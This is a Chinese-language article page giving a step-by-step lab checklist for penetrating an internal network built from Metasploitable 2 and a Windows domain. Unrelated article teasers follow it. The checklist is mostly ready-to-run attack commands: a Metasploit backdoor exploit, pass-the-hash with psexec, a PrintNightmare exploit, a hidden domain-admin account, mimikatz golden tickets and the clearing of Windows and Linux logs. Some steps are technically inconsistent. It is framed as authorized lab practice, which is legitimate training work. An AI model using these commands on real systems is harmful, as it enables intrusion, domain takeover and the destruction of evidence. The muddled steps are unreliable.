news 2026/5/8 22:51:58

内网渗透靶场实操清单(基于 Vulhub+Metasploitable 2)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
内网渗透靶场实操清单(基于 Vulhub+Metasploitable 2)

本清单以“外网突破→内网信息收集→横向移动→权限提升→持久化”为核心流程,使用 Kali Linux 作为攻击机,Metasploitable 2(Linux 靶机)+ Vulhub Windows 域环境靶机作为目标,全程手把手指导。

一、 靶场环境搭建

1. 基础环境准备

设备系统版本IP 规划(建议同一内网段)核心作用
攻击机Kali Linux 2025192.168.56.101执行扫描、漏洞利用、横向移动
外网跳板机Metasploitable 2192.168.56.102模拟外网 Web 服务器,作为内网入口
内网域靶机Windows Server 2019(AD)192.168.56.103域控制器(DC),域名为test.com
内网普通主机Windows 10192.168.56.104域内普通主机,加入test.com

2. 环境配置步骤

  1. 虚拟机网络设置:所有设备均设置为Host-Only 模式,确保处于同一内网段,且攻击机能访问所有靶机。
  2. Metasploitable 2 部署
    • 下载镜像:Metasploitable 2 官方镜像
    • 虚拟机导入后,默认账户密码:msfadmin/msfadmin
  3. Windows 域环境部署(Vulhub 快捷方式)
    • 克隆 Vulhub 仓库:git clone https://github.com/vulhub/vulhub.git
    • 进入 Windows 域环境目录(如vulhub/windows/ad
    • 启动靶机:docker-compose up -d
    • 注意:Vulhub 域靶机默认开启 WinRM、SMB 服务,方便后续渗透。

二、 实操步骤(完整流程)

阶段 1:外网突破 - 获取跳板机(Metasploitable 2)权限

  1. 端口扫描与漏洞发现
    • 攻击机执行 nmap 扫描:nmap -sV -p- 192.168.56.102
    • 发现开放端口:21(FTP)、22(SSH)、80(HTTP)、3306(MySQL)等,且存在UnrealIRCd 后门漏洞(经典漏洞)。
  2. 漏洞利用 - 获取 Meterpreter 会话
    • 启动 msfconsole:msfconsole
    • 搜索漏洞模块:search unrealircd
    • 加载模块:use exploit/unix/irc/unrealircd_3281_backdoor
    • 设置目标 IP:set RHOSTS 192.168.56.102
    • 执行攻击:run
    • 成功获取meterpreter 会话,当前权限为msfadmin

阶段 2:内网信息收集(从跳板机探测内网)

  1. 跳板机内网网段探测
    • 在 meterpreter 中执行:ipconfig,发现跳板机内网网卡 IP 为192.168.56.102,推测内网段为192.168.56.0/24
    • 执行内网存活主机扫描:run post/multi/gather/ping_sweep RHOSTS=192.168.56.0/24
    • 发现存活主机:192.168.56.103(DC)、192.168.56.104(Windows 10)。
  2. 端口与服务探测
    • 对 DC 进行端口扫描:run auxiliary/scanner/portscan/tcp RHOSTS=192.168.56.103 PORTS=135,139,445,389
    • 发现 DC 开放 445(SMB)、389(LDAP)端口,确认是域控制器。
  3. 域环境信息收集
    • 切换到跳板机 shell:shell
    • 安装 impacket 工具(Kali 已预装),执行域用户查询:

      bash

      运行

      python3 /usr/share/doc/python3-impacket/examples/net.py user /domain -target-ip 192.168.56.103
    • 成功获取域用户列表:administratoruser1等。

阶段 3:横向移动 - 从跳板机到内网 Windows 10 主机

  1. 凭证获取(跳板机本地哈希提取)
    • 回到 meterpreter 会话,执行哈希提取:run post/windows/gather/hashdump
    • 若跳板机是 Linux,改用linpeas.sh提取凭证:

      bash

      运行

      wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
    • 假设获取到域用户user1的 NTLM 哈希:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef
  2. 哈希传递攻击(PTH)
    • 使用 impacket 的 psexec.py 执行横向移动:

      bash

      运行

      python3 /usr/share/doc/python3-impacket/examples/psexec.py test.com/user1@192.168.56.104 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef
    • 成功获取 Windows 10 主机的system 权限 shell

阶段 4:权限提升 - 从域用户到域管理员

  1. 域内信息收集(Windows 10 主机)
    • 在 shell 中执行域管理员查询:net group "Domain Admins" /domain
    • 发现域管理员账户:administrator
  2. 利用 PrintNightmare 漏洞提权(假设 DC 未打补丁)
    • 攻击机下载 PrintNightmare 利用脚本:git clone https://github.com/cube0x0/CVE-2021-34527.git
    • 编译脚本后,通过 smb 共享传输到 Windows 10 主机:

      bash

      运行

      impacket-smbserver share . -smb2support
    • Windows 10 主机挂载共享:net use \\192.168.56.101\share
    • 执行提权脚本:CVE-2021-34527.exe \\192.168.56.101\share\malicious.dll
    • 成功获取域管理员权限

阶段 5:持久化 - 域内留后门

  1. 创建隐藏域管理员账户
    • 在 DC 中执行命令:

      cmd

      net user hidden_admin P@ssw0rd! /add /domain net group "Domain Admins" hidden_admin /add /domain
  2. 黄金票据生成
    • 使用 mimikatz 提取域控制器的 KRBTGT 账户哈希:

      bash

      运行

      mimikatz.exe "lsadump::lsa /inject /name:krbtgt" exit
    • 生成黄金票据:

      bash

      运行

      mimikatz.exe "kerberos::golden /domain:test.com /sid:S-1-5-21-xxxxxx /krbtgt:哈希值 /user:backdoor /ptt" exit
    • 利用黄金票据可长期控制整个域,无需再次破解密码。

阶段 6:痕迹清理

  1. Windows 日志清理
    • 执行命令删除事件日志:

      cmd

      wevtutil cl System wevtutil cl Security wevtutil cl Application
  2. Linux 日志清理
    • 清空跳板机日志:

      bash

      运行

      echo "" > /var/log/auth.log echo "" > /var/log/syslog history -c && history -w

三、 靶场实操注意事项

  1. 环境隔离:所有操作必须在独立虚拟机环境中进行,禁止接入公网。
  2. 工具版本:确保 Kali 工具为最新版,执行apt update && apt upgrade升级。
  3. 权限授权:本清单仅用于合法渗透测试学习,必须获得靶机授权
  4. 排错技巧:若攻击失败,优先检查网络连通性、靶机补丁状态、工具参数是否正确。
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/7 17:11:33

PLK1在肿瘤发生发展中的关键作用及靶向治疗前景如何?

一、PLK1的分子结构与功能调控机制是什么?PLK1(Polo样激酶1)是一种丝氨酸/苏氨酸蛋白激酶,在真核细胞中广泛表达,主要参与细胞有丝分裂的起始、维持和结束过程。该蛋白由高度保守的N端激酶结构域(KD&#x…

作者头像 李华
网站建设 2026/5/6 15:34:18

Saber框架:新一代Android MVVM开发的革命性注解解决方案

Saber框架:新一代Android MVVM开发的革命性注解解决方案 【免费下载链接】Saber 🏄 帮助你快速使用Android的LiveData与ViewModel,已支持SavedState 项目地址: https://gitcode.com/gh_mirrors/saber2/Saber 在Android应用开发领域&am…

作者头像 李华
网站建设 2026/5/2 10:28:17

【Android FrameWork】第三十五天:Android RenderScript

Android RenderScript RenderScript 是 Google 为 Android 平台推出的高性能并行计算框架,曾是 Android 生态中处理“CPU/GPU 密集型任务”的核心方案。 它以“自动并行化、跨架构兼容、低开发成本”为核心优势,一度成为图片处理、数值计算等场景的首选&…

作者头像 李华
网站建设 2026/5/1 16:37:09

TDesign Vue Next 企业级组件库深度实践指南

TDesign Vue Next 企业级组件库深度实践指南 【免费下载链接】tdesign-vue-next A Vue3.x UI components lib for TDesign. 项目地址: https://gitcode.com/gh_mirrors/tde/tdesign-vue-next 🚀 在现代前端开发中,选择一款功能丰富、性能优异且易…

作者头像 李华
网站建设 2026/5/1 6:21:28

计算机毕设Java基于web的共享汽车管理系统 Java Web技术驱动的共享汽车在线管理平台 基于Java Web架构的共享汽车运营管理解决方案

计算机毕设Java基于web的共享汽车管理系统06q4h9 (配套有源码 程序 mysql数据库 论文) 本套源码可以在文本联xi,先看具体系统功能演示视频领取,可分享源码参考。随着城市化进程的加快和人们出行需求的多样化,共享汽车作为一种高效…

作者头像 李华
网站建设 2026/4/21 19:34:27

Jellyfin书架插件完整指南:打造专属数字图书馆

Jellyfin书架插件完整指南:打造专属数字图书馆 【免费下载链接】jellyfin-plugin-bookshelf 项目地址: https://gitcode.com/gh_mirrors/je/jellyfin-plugin-bookshelf 还在为海量电子书和有声读物管理烦恼吗?Jellyfin书架插件是你的完美解决方案…

作者头像 李华